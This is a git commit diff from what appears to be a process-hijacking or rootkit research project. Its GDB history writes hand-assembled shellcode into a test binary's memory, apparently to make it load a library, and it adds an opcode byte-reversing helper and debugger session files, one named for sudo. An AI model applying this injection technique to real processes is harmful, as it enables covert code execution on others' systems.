Adapted memory analysis to larger memory addresses inside the virtual address space. Solved bugs and others, adapting code for RELRO.

2025-12-26 11:23:08 +08:00 · 2022-04-04 17:07:45 -04:00
parent 8f28c3a883
commit 748062f464
13 changed files with 12256 additions and 11528 deletions
--- a/src/helpers/.gdb_history
+++ b/src/helpers/.gdb_history
@@ -1,256 +1,256 @@
-q
-find 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
-b *(test_time_values_injection+77 )
-r
-b __timerfd_settime 
-c
-find 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
-x/128i 0x402e95
-x/128x 0x402e95
-x/128x 0x402e90
-x/128i 0x402e90
-x/128i 0x402e89
-x/10i 0x402e89
-x/10i 0x402e90
-x/10i 0x402e80
-x/128i 0x402e89
-x/256i 0x402e89
-x/256i 0x402e90
-find 0x90909090909090909090909090909090 0x401000 0x403000
 context
-x/10i 401520
-x/10i 0x401520
-x/10i 0x401260
-x/10i 0x401250
-q
-r
-disass /r 0x405130
-x/10i 0x401520
-q
-b *(test_time_values_injection+77 )
-disass /r test_time_values_injection
-b *(test_time_values_injection+169)
-r
-b __timerfd_settime 
-c
-x/10i 0x401250
-x/10i 0x401260
-x/10i 0x405130
-x/10 0x405130
-x/10x 0x405130
-c
-x/10x 0x405130
-x/10i 0x405130
-c
-x/10i 0x405130
-si
-c
-r
-q
-r
-b *0x4013a8
-r
-r
-r
-b test_time_values_injection 
-r
-s
-q
-b test_time_values_injection 
-r
-b 0x4013a8
-b *0x4013a8
-b *0x4013a4
-r
-q
-b *0x4013a8
-r
-b test_time_values_injection 
-r
-n
-q
-b test_time_values_injection 
-r
-n
-ni
-del 1
-del 2
-r
-b test_time_values_injection 
-r
-q
-r
-q
-disass test_time_values_injection 
-q
-r
-q
-si
-b test_time_values_injection 
-r
-b __timerfd_settime 
-r
-c
-del 1
-x/10i 0x405130
-c
-r
-b test
-q
-b test_time_values_injection 
-r
-n
-ni
-si
-ni
-si
-si
-q
-b test_time_values_injection 
-r
-x/10x 0x402e95
-x/10x 0x405130
-checksecq
-q
-checksecq
-checksec
-q
-checksec
-q
-q
-q
-q
-x/10x 0x402e95
-b test_time_values_injection 
-r
-x/10x 0x402e95
-x/10x 0x405130
-b __timerfd_settime 
-c
-x/10x 0x405130
-c
-x/10x 0x405130
-q
-b test_time_values_injection 
-r
-b __timerfd_settime 
-c
-si
-x/10x 0x405130
-disass test_time_values_injection 
-b *(test_time_values_injection+169 )
-c
-si
-x/10x 0x402e95
-q
-b test_time_values_injection 
-r
-b __timerfd_settime 
-c
-x/10x 0x402e95
-x/10x 0x405130
-si
-x/10x 0x405130
-b *(test_time_values_injection+169 )
-c
-si
-set *(int64_t *)0x402e95 0x10
-set *(int64_t *)0x402e95 = 0x10
-x/10x 0x405130
-x/10x 0x402e95
-set *(int64_t *)0x402e95 = 0x102131415161718191
-set *(int64_t *)0x7ffff7d89560 = 
-x/10x 0x402e95
-x/10i 0x402e95
-x/10b 0x402e95
-set *(int64_t *)0x402e95 = 0x50
-x/10b 0x402e95
-x/10i 0x402e95
-x/10i 0x7ffff7d89560
-set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F0000
-set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F00
-x/10i 0x402e95
-x/10b 0x402e95
-set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
-x/10b 0x402e95
-x/10i 0x402e95
-disass /r 0x402e95
-disass 0x402e95
-disass /r *0x402e95
-x/10i 0x402e95
-x/10x 0x405130
-x/10i 0x405130
-x/10i 0x401260
-x/10b 0x401260
-x/10i 0x402e95
-x/10b 0x401260
-x/10i 0x402e95
-x/10b 0x402e95
-set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
-set *(int64_t *)0x402e9d = 0xffe0
-x/10b 0x402e95
-context
-si
-x/10i 0x402e95
-si
-q
-b test_time_values_injection 
-r
-b *(test_time_values_injection+169)
-r
-c
-x/10i 0x402e95
-x/10b 0x401260
-x/10x 0x405130
-si
-set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
-x/10b 0x402e95
-x/10i 0x402e95
-set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
-x/10b 0x402e95
-set *(int64_t *)0x402e9d = 0x0000ffe0
-x/10b 0x402e95
-set 0x402e9d = 0xffe000000
-x/10b 0x402e95
-x/12b 0x402e95
-x/10i 0x402e95
-set 0x402e95 = 0x48B86095D8F7FF7F0000
-set 0x402e95 = 0x48B86095D8F7FF7F
-set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
-x/10b 0x402e95
-x/14b 0x402e95
-x/20b 0x402e95
-set *(int64_t *)0x402e9d = 0x0000ffe0
-x/20b 0x402e95
+set *(int64_t *)0x402ead = 0x6F2F650440C76D6F
+set *(int64_t *)0x402eb5 = 0x65786F620840C773
+x/128b 0x402e95
+x/12i 0x402e95
+set *(int64_t *)0x402eb5 = 0x65786F620840C773
+set *(int64_t *)0x402ebd = 0xC746542F730C40C7
+set *(int64_t *)0x402ec5 = 0x40C772732F471040
+set *(int64_t *)0x402ecd = 0x1840C765682F6314
+set *(int64_t *)0x402ed5 = 0x731C40C77265706C
+
+set *(int64_t *)0x402edd = 0x656A2040C76E692F
+
+set *(int64_t *)0x402ee5 = 0x6E6F692440C77463
+set *(int64_t *)0x402eed = 0x2E62696C2840C75F
+
+set *(int64_t *)0x402ef5 = 0x4800006F732C40C7
+set *(int64_t *)0x402efd = 0x007FFFF7F165B0B8
+
+set *(int64_t *)0x402f05 = 0x894800000001BE00
+
+set *(int64_t *)0x402f0d = 0x00C481484889DCDF
+set *(int64_t *)0x402f1e = 0xD0FFE58948000010
+
+x/12i 0x402e95
 x/20i 0x402e95
-x/20b 0x402e95
-x/10i 0x401230
+x/22i 0x402e95
+set *(int64_t *)0x402f0d = 0x00C48148DC8948DF
+x/22i 0x402e95
+set *(int64_t *)0x402f1e = 0xD0FFE58948000010
+x/22i 0x402e95
+set *(int64_t *)0x402f1e = 0x0000E58948000010
+x/22i 0x402e95
+set *(int64_t *)0x402f1e = 0x0
+x/22i 0x402e95
+set *(int64_t *)0x402f15 = 0x0000E58948000010
+set *(int64_t *)0x402f15 = 0xD0FFE58948000010
+x/22i 0x402e95
+x/25i 0x402e95
+si
+fin
+si
+ni
+q
+b *(test_time_values_injection+169)
+r
+q
 disass /r test_time_values_injection 
-x/10i 0x4013a0
-x/10b 0x4013a0
-x/20b 0x402e95
-set *(int64_t *)0x402e9d = 0xffe000000
-x/20b 0x402e95
-set *(int64_t *)0x402e9d = 0xffe00000
-x/20b 0x402e95
-x/10i 0x4013a0
-x/20i 0x402e95
-x/20b 0x402e95
-set *(int64_t *)0x402e95 = 0x7FFFF7D89560B848
-x/20b 0x402e95
-x/20i 0x402e95
-set *(int64_t *)0x402e9d = 0xe0ff00000
-x/20i 0x402e95
-x/20b 0x402e95
-set *(int64_t *)0x402e9d = 0xe0ff0000
-x/20i 0x402e95
-set *(int64_t *)0x402e95 = 0x7FFFF7D89560B848
-x/20i 0x402e95
-context
+b *(test_time_values_injection+96)
+r
 si
 si
-si
-si
-si
-c
+q
+b *(test_time_values_injection+96)
+r
+si
+q
+b *(test_time_values_injection+96)
+r
+si
+x/32b 0x5555555556a9
+x/32x 0x5555555556a9
+x/2i 0x5555555556a9
+disass 0x5555555556a9
+disass /r 0x5555555556a9
+q
+b *(test_time_values_injection+96)
+r
+si
+disass /r 0x5555555556ae
+q
+b *(test_time_values_injection+96)
+r
+si
+disass /r 0x5555555556ae
+q
+r
+q
+r
+q
+b *(test_time_values_injection+96)
+r
+si
+q
+b *(test_time_values_injection+169)
+r
+si
+fin
+q
+b *(test_time_values_injection+169)
+r
+si
+q
+b *(test_time_values_injection+169)
+r
+si
+q
+r
+q
+r
+q
+r
+q
+r
+q
+r
+q
+r
+q
+r
+q
+disass test_time_values_injection 
+b *(test_time_values_injection+96)
+r
+si
+disass 0x7ffff7ede56c
+disass /r 0x7ffff7ede56c
+q
+b *(test_time_values_injection+96)
+r
+si
+q
+b *(test_time_values_injection+96)
+r
+si
+x/2i 0x5555555556a9
+x/2b 0x5555555556a9
+x/22b 0x5555555556a9
+q
+b *(test_time_values_injection+96)
+r
+si
+disass /r 0x5555555556ae
+q
+b *(test_time_values_injection+169)
+r
+si
+q
+b *(test_time_values_injection+169)
+r
+q
+b *(test_time_values_injection+96)
+r
+q
+b *(test_time_values_injection+96)
+r
+q
+b test_time_values_injection 
+r
+ni
+si
+fin
+q
+r
+q
+r
+q
+disass test_time_values_injection 
+b *(test_time_values_injection+96)
+r
+si
+q
+disass test_time_values_injection 
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+restart
+c
+r
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+x/10x 0x5555555556a9
+x/10i 0x5555555556a9
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+q
+b *(test_time_values_injection+94)
+r
+si
+x/10i 555555555510
+x/10i 0x555555555510
+x/10x 0x555555555510
+q
+b *(test_time_values_injection+94)
+r
+si
+x/10x 0x555555555510
+x/10i 0x555555555510
+q
+q
+q
+disass test_time_values_injection 
+b *(test_time_values_injection+167)
+r
+si
+find 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+find 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
+context
+q
+b *(test_time_values_injection+169)
+r
+si
+x/10i 0x401260
+q
+b *(test_time_values_injection+169)
+r
+si
 q
--- a/src/helpers/Makefile
+++ b/src/helpers/Makefile
@@ -12,7 +12,7 @@ execve_hijack.o: execve_hijack.c $(HEADERS)
 	clang -g -c execve_hijack.c

 execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
-	clang -lm -g -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a
+	clang -g -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a

 clean:
 	-rm -f execve_hijack.o
--- a/src/helpers/execve_hijack
+++ b/src/helpers/execve_hijack
--- a/src/helpers/execve_hijack.o
+++ b/src/helpers/execve_hijack.o
--- a/src/helpers/opcode_reverser.py
+++ b/src/helpers/opcode_reverser.py
@@ -0,0 +1,15 @@
+#!/usr/bin/env python3
+import sys
+from itertools import chain
+
+while True:
+    arg = input()[::-1]
+    group = 2
+    result = "".join(chain.from_iterable([reversed(elem) for elem in zip(*[iter(arg)]*group)]))
+
+    if(len(result) != len(arg)):
+        print("String not with even characters?")
+        #exit(1)
+
+    print(result)
+
--- a/src/helpers/peda-session-execve_hijack.txt
+++ b/src/helpers/peda-session-execve_hijack.txt
@@ -1,4 +1,2 @@
-break test_time_values_injection
-break __dlopen
 break *(test_time_values_injection+169)

--- a/src/helpers/peda-session-sudo.txt
+++ b/src/helpers/peda-session-sudo.txt
@@ -1,5 +1,3 @@
-break test_time_values_injection
-disable $bpnum
-break *(test_time_values_injection+169)
+break *(test_time_values_injection+94)
 disable $bpnum